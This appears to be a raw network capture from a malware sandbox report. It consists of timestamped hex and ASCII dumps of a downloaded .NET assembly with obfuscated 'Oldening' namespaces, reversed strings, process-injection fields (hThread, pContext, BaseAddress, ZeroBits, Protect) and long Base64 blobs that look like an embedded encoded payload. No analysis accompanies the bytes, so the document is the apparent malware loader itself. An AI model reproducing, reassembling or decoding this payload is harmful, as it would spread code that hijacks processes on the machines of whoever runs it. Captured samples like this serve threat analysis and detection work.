                                                                                                                                                                                2021-12-01 09:04:36 UTC8INData Raw: 00 86 18 71 03 cc 00 76 00 00 00 00 00 03 00 c6 01 bd 03 d0 04 78 00 00 00 00 00 03 00 c6 01 b6 09 d8 04 7b 00 00 00 00 00 03 00 c6 01 ed 09 62 04 7f 00 00 00 00 00 03 00 86 18 71 03 cc 00 81 00 00 00 00 00 03 00 c6 01 bd 03 e6 04 83 00 00 00 00 00 03 00 c6 01 b6 09 ec 04 85 00 00 00 00 00 03 00 c6 01 ed 09 f8 04 89 00 00 00 00 00 03 00 86 18 71 03 cc 00 8a 00 00 00 00 00 03 00 c6 01 bd 03 ff 04 8c 00 00 00 00 00 03 00 c6 01 b6 09 0b 05 92 00 00 00 00 00 03 00 c6 01 ed 09 1d 05 9a 00 00 00 00 00 03 00 86 18 71 03 cc 00 9d 00 00 00 00 00 03 00 c6 01 bd 03 28 05 9f 00 00 00 00 00 03 00 c6 01 b6 09 82 04 a0 00 00 00 00 00 03 00 c6 01 ed 09 f8 04 a3 00 00 00 00 00 03 00 86 18 71 03 cc 00 a4 00 00 00 00 00 03 00 c6 01 bd 03 2d 05 a6 00 00 00 00 00 03 00 c6 01
                                                                                                                                                                                Data Ascii: qvx{bqqq(q-
                                                                                                                                                                                2021-12-01 09:04:36 UTC9INData Raw: 00 00 02 00 e6 09 00 00 01 00 f7 09 00 00 01 00 d4 0b 00 00 02 00 6a 0a 00 00 01 00 d8 0b 00 00 02 00 dd 0b 00 00 01 00 d8 0b 00 00 02 00 dd 0b 00 00 03 00 dd 09 00 00 04 00 e6 09 00 00 01 00 f7 09 00 00 01 00 98 09 00 00 01 00 9d 03 31 00 71 03 b0 00 0c 00 71 03 cc 00 0c 00 bd 03 d2 00 59 00 71 03 d7 00 09 00 71 03 d7 00 51 00 36 04 10 01 51 00 3b 04 13 01 89 00 4f 04 19 01 51 00 3b 04 1e 01 91 00 77 04 28 01 51 00 8a 04 2c 01 99 00 b0 04 3c 01 51 00 b6 04 55 01 a1 00 c3 04 59 01 89 00 4f 04 60 01 89 00 e7 04 6b 01 89 00 f4 04 70 01 89 00 f9 04 79 01 29 00 4b 05 97 01 29 00 51 05 9a 01 b9 00 a9 05 b1 01 14 00 19 06 c9 01 14 00 20 06 d4 01 29 00 27 06 d8 01 1c 00 bd 03 e6 01 29 00 43 06 f9 01 f1 00 4e 06 fd 01 f9 00 77 06 06 02 f9 00 80 06 0b 02 01 01 71
                                                                                                                                                                                Data Ascii: j1qqYqqQ6Q;OQ;w(Q,<QUYO`kpy)K)Q )')CNwq
                                                                                                                                                                                2021-12-01 09:04:36 UTC11INData Raw: 6f 00 4f 6c 64 65 6e 69 6e 67 2e 4d 61 70 73 00 4f 62 6a 65 63 74 00 53 79 73 74 65 6d 00 6d 73 63 6f 72 6c 69 62 00 57 6f 72 6b 65 72 00 4f 6c 64 65 6e 69 6e 67 2e 53 68 61 72 65 64 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 32 5f 30 00 49 6e 69 74 69 61 6c 69 7a 65 72 4d 65 73 73 61 67 65 44 65 53 65 72 69 61 6c 69 7a 65 72 00 4f 6c 64 65 6e 69 6e 67 2e 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 00 4d 6f 64 65 6c 00 4f 6c 64 65 6e 69 6e 67 2e 4c 69 73 74 65 6e 65 72 73 00 3c 3e 6f 5f 5f 34 00 50 61 67 65 43 6f 6e 74 61 69 6e 65 72 53 74 75 62 00 4f 6c 64 65 6e 69 6e 67 2e 53 74 75 62 73 00 50 72 6f 78 79 00 3c 3e 6f 5f 5f 35 00 53 65 72 76 65 72 00 53 74 75 62 51 75 65 75 65 43 6c 61 73 73 00 4f 6c 64 65 6e 69 6e 67 2e 43 6c 61 73 73 65 73 00 41
                                                                                                                                                                                Data Ascii: oOldening.MapsObjectSystemmscorlibWorkerOldening.Shared<>c__DisplayClass2_0InitializerMessageDeSerializerOldening.SerializationModelOldening.Listeners<>o__4PageContainerStubOldening.StubsProxy<>o__5ServerStubQueueClassOldening.ClassesA
                                                                                                                                                                                2021-12-01 09:04:36 UTC12INData Raw: 72 6f 73 6f 66 74 2e 43 53 68 61 72 70 2e 52 75 6e 74 69 6d 65 42 69 6e 64 65 72 00 4d 69 63 72 6f 73 6f 66 74 2e 43 53 68 61 72 70 00 43 6f 6e 76 65 72 74 00 43 61 6c 6c 53 69 74 65 42 69 6e 64 65 72 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 6c 65 72 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 43 6f 72 65 00 43 53 68 61 72 70 42 69 6e 64 65 72 46 6c 61 67 73 00 43 61 6c 6c 53 69 74 65 60 31 00 46 75 6e 63 60 33 00 43 61 6c 6c 53 69 74 65 00 43 72 65 61 74 65 00 54 61 72 67 65 74 00 54 6f 43 68 61 72 41 72 72 61 79 00 43 68 61 72 00 56 65 72 69 66 79 49 6e 66 6f 00 67 65 74 5f 4c 65 6e 67 74 68 00 46 72 6f 6d 42 61 73 65 36 34 43 68 61 72 41 72 72 61 79 00 45 6e 63 6f 64 69 6e 67 00 53 79 73 74 65 6d 2e 54 65 78 74 00 67 65 74 5f
                                                                                                                                                                                Data Ascii: rosoft.CSharp.RuntimeBinderMicrosoft.CSharpConvertCallSiteBinderSystem.Runtime.CompilerServicesSystem.CoreCSharpBinderFlagsCallSite`1Func`3CallSiteCreateTargetToCharArrayCharVerifyInfoget_LengthFromBase64CharArrayEncodingSystem.Textget_
                                                                                                                                                                                2021-12-01 09:04:36 UTC13INData Raw: 48 61 6e 64 6c 65 73 00 64 77 43 72 65 61 74 69 6f 6e 46 6c 61 67 73 00 6c 70 45 6e 76 69 72 6f 6e 6d 65 6e 74 00 6c 70 43 75 72 72 65 6e 74 44 69 72 65 63 74 6f 72 79 00 6c 70 53 74 61 72 74 75 70 49 6e 66 6f 00 6c 70 50 72 6f 63 65 73 72 65 64 61 6f 4c 72 65 6e 67 69 73 65 44 6e 6f 69 74 61 7a 69 6c 61 69 72 65 53 6e 67 69 73 65 44 6c 65 64 6f 4d 74 6e 65 6e 6f 70 6d 6f 43 6d 65 74 73 79 53 32 39 34 31 38 00 68 4e 65 77 54 6f 6b 65 6e 00 68 54 68 72 65 61 64 00 70 43 6f 6e 74 65 78 74 00 76 00 69 76 6b 00 66 69 72 73 74 00 76 69 73 00 50 72 6f 63 65 73 73 48 61 6e 64 6c 65 00 42 61 73 65 41 64 64 72 65 73 73 00 5a 65 72 6f 42 69 74 73 00 52 65 67 69 6f 6e 53 69 7a 65 00 41 6c 6c 6f 63 61 74 69 6f 6e 54 79 70 65 00 50 72 6f 74 65 63 74 00 69 74 65 6d 00
                                                                                                                                                                                Data Ascii: HandlesdwCreationFlagslpEnvironmentlpCurrentDirectorylpStartupInfolpProcesredaoLrengiseDnoitazilaireSngiseDledoMtnenopmoCmetsyS29418hNewTokenhThreadpContextvivkfirstvisProcessHandleBaseAddressZeroBitsRegionSizeAllocationTypeProtectitem
                                                                                                                                                                                2021-12-01 09:04:36 UTC15INData Raw: 4f 00 43 00 54 00 55 00 33 00 55 00 67 00 3d 00 3d 00 00 41 49 00 39 00 39 00 37 00 31 00 54 00 6f 00 68 00 50 00 67 00 64 00 41 00 4d 00 6c 00 55 00 41 00 43 00 54 00 45 00 63 00 43 00 55 00 41 00 73 00 41 00 77 00 56 00 57 00 50 00 6d 00 77 00 3d 00 00 59 4a 00 39 00 39 00 37 00 31 00 67 00 77 00 39 00 4d 00 41 00 63 00 65 00 59 00 41 00 38 00 74 00 43 00 53 00 6b 00 56 00 4d 00 53 00 6f 00 47 00 50 00 7a 00 77 00 4a 00 50 00 54 00 30 00 2b 00 66 00 52 00 30 00 44 00 42 00 31 00 6c 00 47 00 58 00 77 00 3d 00 3d 00 00 61 4a 00 39 00 39 00 37 00 31 00 67 00 77 00 39 00 4a 00 41 00 63 00 30 00 4b 00 52 00 45 00 58 00 66 00 54 00 56 00 56 00 4d 00 53 00 51 00 34 00 48 00 77 00 55 00 4c 00 49 00 57 00 41 00 2b 00 47 00 54 00 63 00 39 00 50 00 7a 00 78 00 44
                                                                                                                                                                                Data Ascii: OCTU3Ug==AI9971TohPgdAMlUACTEcCUAsAwVWPmw=YJ9971gw9MAceYA8tCSkVMSoGPzwJPT0+fR0DB1lGXw==aJ9971gw9JAc0KREXfTVVMSQ4HwULIWA+GTc9PzxD
                                                                                                                                                                                2021-12-01 09:04:36 UTC16INData Raw: 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 15 01 54 02 10 53 6b 69 70 56 65 72 69 66 69 63 61 74 69 6f 6e 01 08 b7 7a 5c 56 19 34 e0 89 05 00 01 01 1d 0e 04 20 01 01 0e 03 00 00 0a 03 00 00 01 08 00 02 01 12 80 8c 1d 1c 05 15 12 21 01 02 05 20 02 01 1c 18 04 20 00 13 00 03 20 00 01 04 06 12 80 8c 03 20 00 02 2b 07 16 02 0f 11 70 0f 11 78 0e 18 18 12 34 11 80 84 11 6c 12 34 11 80 88 18 0a 0b 1d 05 09 11 6c 0f 05 45 1d 05 07 0f 11 80 80 08 02 06 18 05 00 01 18 0f 01 04 00 01 08 1c 04 00 01 18 0a 04 0a 01 12 4c 03 00 00 0e 05 00 02 02 18 18 04 0a 01 12 44 04 0a 01 12 48 04 00 01 01 08 04 0a 01 12 3c 04 0a 01 12 58 04 0a 01 12 5c 04 0a 01 12 40 03 20 00 0a 06 00 01 12 51 11 55 05 00 01 08 12 51 04 0a 01 12 50 04 00 01 18 08 08 00 04 01 1d 05
                                                                                                                                                                                Data Ascii: ken=b77a5c561934e089TSkipVerificationz\V4 ! +px4l4lELDH<X\@ QUQP
                                                                                                                                                                                2021-12-01 09:04:36 UTC17INData Raw: 2e 4e 45 54 20 46 72 61 6d 65 77 6f 72 6b 20 34 04 01 00 00 00 0c 01 00 03 00 00 00 02 00 00 00 00 00 09 20 02 01 11 80 e1 11 80 e5 56 00 39 00 39 00 37 00 31 00 46 00 5a 00 78 00 55 00 55 00 46 00 42 00 54 00 55 00 46 00 42 00 51 00 55 00 46 00 46 00 51 00 55 00 46 00 42 00 51 00 53 00 38 00 76 00 4f 00 45 00 46 00 42 00 54 00 47 00 64 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55
                                                                                                                                                                                Data Ascii: .NET Framework 4 V9971FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
                                                                                                                                                                                2021-12-01 09:04:36 UTC19INData Raw: 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 7a 00 55 00 77 00 57 00 6c 00 68 00 6f 00 4d 00 45 00 46 00 42 00 51 00 55 00 46 00 77 00 53 00 56 00 6c 00 43 00 51 00 55 00 46 00 42 00 5a 00 30 00 46 00 42 00 51 00 55 00 46 00 70 00 51 00 55 00 56 00 42 00 51 00 55 00 46 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 30 00 46 00 42 00 51 00 55 00 64 00 42 00 64 00 57 00 4e 00 75 00 54 00 6e 00 6c 00 5a 00 64 00 30 00 46 00 42 00 51 00 55 00 35 00 52 00 52 00 55 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 55 00 56 00 42 00 51 00 55 00 46 00 6e 00 51 00 55 00 46 00 42 00 51 00 30 00 31 00 42 00 55 00 55 00 46 00 42 00 51 00 55 00
                                                                                                                                                                                Data Ascii: BQUFBQUFBQzUwWlhoMEFBQUFwSVlCQUFBZ0FBQUFpQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU5RRUFBQUF3QUVBQUFnQUFBQ01BUUFBQU
                                                                                                                                                                                2021-12-01 09:04:36 UTC20INData Raw: 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46
                                                                                                                                                                                Data Ascii: BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
                                                                                                                                                                                2021-12-01 09:04:36 UTC21INData Raw: 00 55 00 55 00 46 00 48 00 59 00 33 00 68 00 76 00 51 00 55 00 46 00 42 00 62 00 32 00 78 00 6e 00 55 00 47 00 4e 00 42 00 51 00 55 00 46 00 52 00 62 00 30 00 46 00 52 00 51 00 55 00 46 00 4c 00 4d 00 6a 00 68 00 6a 00 51 00 55 00 46 00 42 00 53 00 30 00 4e 00 36 00 61 00 55 00 5a 00 42 00 5a 00 30 00 46 00 42 00 51 00 6a 00 49 00 34 00 5a 00 45 00 46 00 42 00 51 00 55 00 74 00 47 00 65 00 47 00 4e 00 61 00 61 00 6c 00 5a 00 6e 00 51 00 55 00 46 00 42 00 52 00 57 00 78 00 47 00 62 00 6b 00 6c 00 43 00 51 00 55 00 46 00 43 00 64 00 32 00 4e 00 73 00 61 00 30 00 46 00 42 00 53 00 45 00 49 00 72 00 53 00 47 00 64 00 42 00 51 00 55 00 4e 00 70 00 5a 00 32 00 5a 00 42 00 51 00 55 00 46 00 4c 00 62 00 32 00 6c 00 56 00 57 00 47 00 4e 00 75 00 52 00 55 00 46 00
                                                                                                                                                                                Data Ascii: UUFHY3hvQUFBb2xnUGNBQUFRb0FRQUFLMjhjQUFBS0N6aUZBZ0FBQjI4ZEFBQUtGeGNaalZnQUFBRWxGbklCQUFCd2Nsa0FBSEIrSGdBQUNpZ2ZBQUFLb2lVWGNuRUF
                                                                                                                                                                                2021-12-01 09:04:36 UTC23INData Raw: 52 00 55 00 64 00 69 00 65 00 55 00 6c 00 43 00 51 00 55 00 46 00 5a 00 55 00 6b 00 4a 00 53 00 52 00 55 00 68 00 69 00 65 00 56 00 46 00 43 00 51 00 55 00 46 00 5a 00 55 00 6b 00 4a 00 53 00 52 00 55 00 55 00 76 00 5a 00 32 00 4a 00 5a 00 51 00 56 00 46 00 42 00 52 00 32 00 4e 00 35 00 64 00 30 00 46 00 42 00 51 00 58 00 41 00 72 00 4b 00 30 00 46 00 42 00 51 00 55 00 4a 00 44 00 56 00 58 00 52 00 47 00 65 00 56 00 6f 00 72 00 4f 00 57 00 64 00 42 00 51 00 55 00 4a 00 51 00 4e 00 45 00 63 00 7a 00 64 00 30 00 56 00 42 00 51 00 6d 00 35 00 4e 00 64 00 45 00 46 00 42 00 51 00 55 00 74 00 4b 00 57 00 55 00 51 00 30 00 51 00 55 00 46 00 42 00 52 00 55 00 74 00 42 00 53 00 55 00 46 00 42 00 51 00 33 00 52 00 32 00 53 00 6d 00 64 00 46 00 51 00 55 00 4a 00 6f
                                                                                                                                                                                Data Ascii: RUdieUlCQUFZUkJSRUhieVFCQUFZUkJSRUUvZ2JZQVFBR2N5d0FBQXArK0FBQUJDVXRGeVorOWdBQUJQNEczd0VBQm5NdEFBQUtKWUQ0QUFBRUtBSUFBQ3R2SmdFQUJo
                                                                                                                                                                                2021-12-01 09:04:36 UTC24INData Raw: 00 55 00 46 00 4e 00 5a 00 30 00 4e 00 42 00 51 00 55 00 46 00 4c 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 52 00 30 00 46 00 42 00 51 00 55 00 46 00 36 00 5a 00 30 00 6c 00 42 00 51 00 55 00 35 00 52 00 51 00 30 00 46 00 42 00 51 00 55 00 52 00 42 00 51 00 55 00 46 00 42 00 51 00 32 00 64 00 42 00 51 00 55 00 46 00 53 00 63 00 33 00 64 00 43 00 51 00 55 00 4a 00 6e 00 51 00 56 00 46 00 42 00 51 00 55 00 46 00 6e 00 51 00 55 00 46 00 46 00 57 00 45 00 30 00 79 00 51 00 55 00 46 00 42 00 53 00 30 00 4e 00 6e 00 53 00 57 00 5a 00 44 00 62 00 7a 00 46 00 68 00 51 00 55 00 46 00 42 00 51 00 6b 00 70 00 6b 00 52 00 46 00 70 00 42 00 51 00 55 00 46 00 46 00 53 00 30 00 52 00 6a 00
                                                                                                                                                                                Data Ascii: UFNZ0NBQUFLQUFBQUFBQUFBQUFBQUFBR0FBQUF6Z0lBQU5RQ0FBQURBQUFBQ2dBQUFSc3dCQUJnQVFBQUFnQUFFWE0yQUFBS0NnSWZDbzFhQUFBQkpkRFpBQUFFS0Rj
                                                                                                                                                                                2021-12-01 09:04:36 UTC25INData Raw: 79 00 38 00 76 00 4c 00 7a 00 4e 00 6e 00 54 00 57 00 30 00 7a 00 5a 00 30 00 52 00 6c 00 51 00 58 00 6c 00 69 00 5a 00 55 00 46 00 42 00 57 00 58 00 46 00 44 00 55 00 33 00 42 00 43 00 57 00 6b 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 52 00 7a 00 68 00 42 00 51 00 55 00 46 00 43 00 52 00 6b 00 46 00 42 00 51 00 55 00 46 00 30 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 4e 00 51 00 55 00 46 00 42 00 51 00 56 00 42 00 42 00 51 00 55 00 46 00 43 00 51 00 57 00 64 00 42 00 51 00 55 00 46 00 48 00 4f 00 45 00 46 00 42 00 51 00 55 00 4a 00 4c 00 51 00 55 00 46 00 42 00 51 00 58 00 56 00 52 00 51 00 55 00 46 00 42 00 52 00 32 00 39 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51
                                                                                                                                                                                Data Ascii: y8vLzNnTW0zZ0RlQXliZUFBWXFDU3BCWkFBQUFBQUFBRzhBQUFCRkFBQUF0QUFBQUFNQUFBQVBBQUFCQWdBQUFHOEFBQUJLQUFBQXVRQUFBR29BQUFBQUFBQUFBQUFBQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC27INData Raw: 00 56 00 47 00 53 00 48 00 64 00 74 00 54 00 6c 00 64 00 6e 00 51 00 55 00 46 00 42 00 55 00 31 00 68 00 52 00 4d 00 58 00 64 00 42 00 51 00 55 00 4a 00 44 00 5a 00 7a 00 4e 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 70 00 6e 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 79 00 55 00 55 00 46 00 42 00 51 00 6d 00 35 00 4a 00 4c 00 30 00 46 00 6e 00 51 00 6e 00 64 00 69 00 65 00 56 00 56 00 42 00 51 00 55 00 46 00 77 00 64 00 6b 00 39 00 42 00 52 00 55 00 46 00 43 00 61 00 45 00 56 00 49 00 52 00 56 00 46 00 52 00 55 00 6b 00 4a 00 53 00 4f 00 45 00 78 00 71 00 56 00 6d 00 39 00 42 00 51 00 55 00 46 00 46 00 62 00 44 00 42 00 4d 00 4f 00 45 00 46 00 42 00 51 00 56 00 46 00 76 00 54 00 6e 00 64 00 42 00 51 00 55 00 4e 00 75 00 54 00 54 00 52 00 42 00 51 00
                                                                                                                                                                                Data Ascii: VGSHdtTldnQUFBU1hRMXdBQUJDZzNBQUFLY3pnQUFBcHZyUUFBQm5JL0FnQndieVVBQUFwdk9BRUFCaEVIRVFRUkJSOExqVm9BQUFFbDBMOEFBQVFvTndBQUNuTTRBQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC28INData Raw: 4e 00 42 00 51 00 55 00 45 00 35 00 51 00 57 00 64 00 42 00 51 00 55 00 46 00 33 00 51 00 55 00 46 00 42 00 51 00 54 00 68 00 42 00 51 00 55 00 46 00 46 00 59 00 6b 00 31 00 42 00 57 00 55 00 46 00 54 00 5a 00 30 00 56 00 42 00 51 00 55 00 46 00 52 00 51 00 55 00 46 00 43 00 52 00 6e 00 70 00 53 00 5a 00 30 00 46 00 42 00 51 00 32 00 64 00 76 00 51 00 30 00 68 00 76 00 4d 00 57 00 46 00 42 00 51 00 55 00 46 00 43 00 53 00 6d 00 52 00 45 00 55 00 45 00 46 00 42 00 51 00 55 00 56 00 4c 00 52 00 47 00 4e 00 42 00 51 00 55 00 46 00 77 00 65 00 6b 00 39 00 42 00 51 00 55 00 46 00 44 00 61 00 57 00 63 00 31 00 51 00 55 00 46 00 42 00 53 00 30 00 4e 00 33 00 59 00 32 00 39 00 50 00 5a 00 30 00 46 00 42 00 51 00 32 00 6b 00 77 00 53 00 45 00 4a 00 6e 00 4d 00 32
                                                                                                                                                                                Data Ascii: NBQUE5QWdBQUF3QUFBQThBQUFFYk1BWUFTZ0VBQUFRQUFCRnpSZ0FBQ2dvQ0hvMWFBQUFCSmREUEFBQUVLRGNBQUFwek9BQUFDaWc1QUFBS0N3Y29PZ0FBQ2kwSEJnM2
                                                                                                                                                                                2021-12-01 09:04:36 UTC29INData Raw: 00 42 00 52 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 54 00 31 00 46 00 42 00 51 00 55 00 46 00 42 00 56 00 55 00 4a 00 42 00 51 00 55 00 45 00 72 00 51 00 56 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 55 00 46 00 42 00 51 00 54 00 68 00 42 00 51 00 55 00 46 00 46 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 43 00 5a 00 30 00 46 00 42 00 51 00 55 00 51 00 77 00 51 00 6b 00 46 00 42 00 51 00 6b 00 52 00 42 00 55 00 55 00 46 00 42 00 51 00 58 00 64 00 42 00 51 00 55 00 46 00 42 00 4f 00 45 00 46 00 42 00 51 00 55 00 56 00 69 00 54 00 55 00 46 00 56 00 51 00 55 00 56 00 42 00 52 00 55 00 46 00 42 00 51 00 56 00 56 00 42 00 51 00 55 00 4a 00 47 00 65 00 6c 00 4e 00 42 00 51 00 55 00 46 00 44 00 5a 00 32 00 39 00 44 00 53 00 47 00 38 00 78 00 59 00 55 00
                                                                                                                                                                                Data Ascii: BRUFBQUFBT1FBQUFBVUJBQUErQVFBQUF3QUFBQThBQUFFQUFBQUFCZ0FBQUQwQkFBQkRBUUFBQXdBQUFBOEFBQUViTUFVQUVBRUFBQVVBQUJGelNBQUFDZ29DSG8xYU
                                                                                                                                                                                2021-12-01 09:04:36 UTC31INData Raw: 46 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 43 00 5a 00 30 00 46 00 42 00 51 00 55 00 46 00 4e 00 51 00 6b 00 46 00 42 00 51 00 55 00 70 00 42 00 55 00 55 00 46 00 42 00 51 00 58 00 64 00 42 00 51 00 55 00 46 00 42 00 4f 00 45 00 46 00 42 00 51 00 55 00 56 00 69 00 54 00 55 00 46 00 4e 00 51 00 56 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 56 00 6c 00 42 00 51 00 55 00 4a 00 47 00 4b 00 30 00 68 00 6e 00 51 00 55 00 46 00 44 00 5a 00 32 00 39 00 44 00 52 00 6d 00 30 00 34 00 62 00 6b 00 46 00 42 00 51 00 55 00 74 00 49 00 4d 00 31 00 6c 00 36 00 52 00 32 00 64 00 4a 00 57 00 47 00 4a 00 35 00 59 00 30 00 46 00 42 00 51 00 57 00 39 00 6d 00 54 00 56 00 52 00 4e 00 55 00 45 00 46 00 35 00 61 00 45 00 78 00 42 00 51 00 55 00 46 00 4c 00 51 00 57 00 6c
                                                                                                                                                                                Data Ascii: FQUFBQUFCZ0FBQUFNQkFBQUpBUUFBQXdBQUFBOEFBQUViTUFNQVFBQUFBQVlBQUJGK0hnQUFDZ29DRm04bkFBQUtIM1l6R2dJWGJ5Y0FBQW9mTVRNUEF5aExBQUFLQWl
                                                                                                                                                                                2021-12-01 09:04:36 UTC32INData Raw: 00 51 00 32 00 64 00 7a 00 53 00 45 00 74 00 45 00 62 00 30 00 46 00 42 00 51 00 57 00 39 00 7a 00 52 00 33 00 64 00 6a 00 62 00 33 00 6c 00 6e 00 51 00 55 00 46 00 43 00 61 00 57 00 64 00 4a 00 51 00 55 00 46 00 42 00 63 00 6d 00 49 00 35 00 52 00 55 00 4a 00 42 00 51 00 56 00 70 00 32 00 4d 00 55 00 46 00 46 00 51 00 55 00 4a 00 6e 00 63 00 6d 00 56 00 42 00 65 00 57 00 4a 00 6c 00 51 00 55 00 34 00 30 00 52 00 45 00 70 00 30 00 4e 00 45 00 46 00 43 00 61 00 57 00 39 00 42 00 51 00 55 00 46 00 43 00 51 00 6b 00 35 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 7a 00 51 00 6b 00 46 00 42 00 51 00 56 00 6c 00 42 00 51 00 55 00 46 00 42 00 53 00 58 00 64 00 46 00 51 00 55 00 46 00 42 00 54 00 55 00 46 00 42 00 51 00 55 00 46 00
                                                                                                                                                                                Data Ascii: Q2dzSEtEb0FBQW9zR3djb3lnQUFCaWdJQUFBcmI5RUJBQVp2MUFFQUJncmVBeWJlQU40REp0NEFCaW9BQUFCQk5BQUFBQUFBQUFzQkFBQVlBQUFBSXdFQUFBTUFBQUF
                                                                                                                                                                                2021-12-01 09:04:36 UTC33INData Raw: 59 00 6a 00 46 00 72 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 58 00 64 00 30 00 46 00 42 00 51 00 32 00 64 00 33 00 63 00 6c 00 42 00 42 00 61 00 48 00 5a 00 45 00 64 00 30 00 46 00 42 00 51 00 32 00 35 00 52 00 57 00 45 00 46 00 42 00 51 00 55 00 4a 00 4c 00 51 00 58 00 4e 00 42 00 51 00 55 00 46 00 5a 00 54 00 6b 00 4e 00 58 00 4f 00 55 00 6c 00 42 00 55 00 55 00 46 00 48 00 59 00 32 00 6c 00 7a 00 51 00 30 00 46 00 49 00 51 00 57 00 39 00 51 00 55 00 55 00 46 00 42 00 51 00 32 00 6c 00 33 00 57 00 6b 00 4e 00 58 00 4f 00 55 00 6c 00 42 00 55 00 55 00 46 00 48 00 59 00 32 00 6c 00 7a 00 51 00 30 00 46 00 49 00 51 00 57 00 39 00 51 00 55 00 55 00 46 00 42 00 51 00 32 00 6c 00 33 00 53 00 45 00 4a 00 6e 00 62 00 48 00 5a 00 51 00 5a 00 30 00 46 00 42
                                                                                                                                                                                Data Ascii: YjFrQUFBcHZXd0FBQ2d3clBBaHZEd0FBQ25RWEFBQUJLQXNBQUFZTkNXOUlBUUFHY2lzQ0FIQW9QUUFBQ2l3WkNXOUlBUUFHY2lzQ0FIQW9QUUFBQ2l3SEJnbHZQZ0FB
                                                                                                                                                                                2021-12-01 09:04:36 UTC34INData Raw: 00 57 00 64 00 48 00 59 00 6a 00 42 00 6e 00 51 00 6b 00 46 00 42 00 57 00 58 00 4a 00 43 00 57 00 45 00 6c 00 79 00 51 00 57 00 64 00 43 00 64 00 32 00 49 00 77 00 61 00 30 00 4a 00 42 00 51 00 56 00 6c 00 48 00 51 00 6d 00 30 00 35 00 53 00 30 00 46 00 52 00 51 00 55 00 64 00 4c 00 51 00 31 00 6c 00 42 00 51 00 55 00 46 00 76 00 64 00 45 00 4e 00 42 00 57 00 6e 00 5a 00 54 00 5a 00 30 00 56 00 42 00 51 00 6d 00 6c 00 7a 00 52 00 6d 00 4e 00 70 00 63 00 30 00 4e 00 42 00 53 00 45 00 4a 00 32 00 55 00 33 00 64 00 46 00 51 00 55 00 4a 00 6e 00 57 00 55 00 64 00 69 00 4d 00 48 00 64 00 43 00 51 00 55 00 46 00 5a 00 62 00 30 00 70 00 6e 00 51 00 55 00 46 00 44 00 61 00 54 00 42 00 4a 00 51 00 6d 00 30 00 35 00 54 00 55 00 46 00 52 00 51 00 55 00 64 00 4c 00
                                                                                                                                                                                Data Ascii: WdHYjBnQkFBWXJCWElyQWdCd2Iwa0JBQVlHQm05S0FRQUdLQ1lBQUFvdENBWnZTZ0VBQmlzRmNpc0NBSEJ2U3dFQUJnWUdiMHdCQUFZb0pnQUFDaTBJQm05TUFRQUdL
